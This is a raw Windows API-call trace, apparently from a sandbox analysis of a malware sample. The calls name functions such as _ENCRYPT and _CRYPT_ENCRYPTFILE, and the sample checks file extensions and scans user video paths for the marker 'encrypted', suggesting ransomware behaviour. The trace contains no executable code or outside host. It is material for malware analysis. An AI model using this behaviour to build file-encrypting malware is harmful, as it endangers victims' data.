wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0042.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0042.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0042.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0042.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0042.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0042.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0042.164] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0042.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0042.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0042.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0042.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0042.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0042.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0042.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0042.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0042.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0042.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0042.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0042.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0042.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0042.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0042.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0042.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0042.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0042.165] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0042.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0042.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0042.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0042.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0042.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0042.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0042.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0042.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0042.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0042.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0042.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0042.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.165] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0042.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0042.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8b0 [0042.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88c8b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0042.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0042.166] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0042.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0042.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0042.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0042.166] CloseHandle (hObject=0x128) returned 1 [0042.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0042.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0042.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0042.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0042.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0042.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0042.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0042.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0042.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0042.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0042.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0042.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0042.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0042.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0042.167] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0042.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0042.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0042.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0042.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0042.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0042.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0042.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0042.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0042.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0042.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0042.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0042.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0042.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0042.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.167] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0042.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0042.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0042.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0042.168] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0042.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0042.168] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0042.168] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0042.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0042.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.168] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0042.168] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0042.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0042.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0042.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0042.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0042.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0042.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0042.168] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0042.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0042.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0042.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0042.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0042.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.168] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.168] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.169] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x682dd840, ftCreationTime.dwHighDateTime=0x1d5c096, ftLastAccessTime.dwLowDateTime=0x242d1200, ftLastAccessTime.dwHighDateTime=0x1d5b75e, ftLastWriteTime.dwLowDateTime=0x242d1200, ftLastWriteTime.dwHighDateTime=0x1d5b75e, nFileSizeHigh=0x0, nFileSizeLow=0xe765, dwReserved0=0x0, dwReserved1=0x777648, cFileName="9c5dg.mkv", cAlternateFileName="")) returned 0x7c20c0 [0042.169] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0042.169] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.169] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x682dd840, ftCreationTime.dwHighDateTime=0x1d5c096, ftLastAccessTime.dwLowDateTime=0x242d1200, ftLastAccessTime.dwHighDateTime=0x1d5b75e, ftLastWriteTime.dwLowDateTime=0x242d1200, ftLastWriteTime.dwHighDateTime=0x1d5b75e, nFileSizeHigh=0x0, nFileSizeLow=0xe765, dwReserved0=0x0, dwReserved1=0x777648, cFileName="9c5dg.mkv", cAlternateFileName="")) returned 0x7c20c0 [0042.169] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0042.169] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sKe8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ke8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZL\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c5dg.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.171] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.171] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0042.171] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0042.171] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.171] 